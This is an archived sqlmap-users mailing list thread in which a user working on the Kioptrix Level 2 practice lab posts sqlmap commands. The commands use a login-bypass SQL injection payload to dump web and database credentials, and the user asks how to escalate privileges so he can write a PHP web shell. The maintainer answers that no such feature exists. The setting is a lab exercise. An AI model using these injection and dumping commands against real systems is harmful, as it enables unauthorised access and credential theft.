Can't wait... sqlmap is making me lazier by the day!
On 13 January 2012 12:39, Miroslav Stampar <miroslav.stam...@gmail.com>wrote:
> Hi Phaedrus.
>
> Sorry, for the time being there is no such mechanism inside sqlmap. Also,
> once implemented it will be most certainly limited to only MSSQL and Oracle
> (
> http://www.abysssec.com/blog/2008/10/16/ms-sql-injection-privilege-scalation/&;
> http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/
> ).
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Jan 13, 2012 at 5:02 AM, Phaedrus Black
> <phaedrus.bl...@gmail.com>wrote:
>
>> hello:
>>
>> I discovered a vulnerability that allows me to bypass the login screen.
>> btw this is the Kioptrix Level 2 puzzle and not a live client/target.
>>
>> I've managed to dump credentials for the administrator's web interface in
>> addition to the database users themselves. There were a few recon commands
>> but the meatiest items are below.
>>
>> Specific commands included:
>>
>> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
>> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
>> --string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <---
>> gets me user credentials for the webapp
>>
>> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
>> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
>> --string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me
>> user credentials for the DB.
>>
>> However, I've discovered that the db user that I am running as does
>> **not** have the appropriate privileges to write
>> files to the system.
>>
>> My objective is to write something like phpshell to the /var/www
>> directory and go from there.
>>
>> Is there a way for sqlmap to switch from unprivileged user A to
>> privileged user B if I have both sets of credentials? If so, I can then
>> use the "file-write" and "file-dest" options.
>>
>> thanks,
>>
>> -pb
>>
>>
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> RSA(R) Conference 2012
>> Mar 27 - Feb 2
>> Save $400 by Jan. 27
>> Register now!
>> http://p.sf.net/sfu/rsa-sfdev2dev2
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> RSA(R) Conference 2012
> Mar 27 - Feb 2
> Save $400 by Jan. 27
> Register now!
> http://p.sf.net/sfu/rsa-sfdev2dev2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
RSA(R) Conference 2012
Mar 27 - Feb 2
Save $400 by Jan. 27
Register now!
http://p.sf.net/sfu/rsa-sfdev2dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
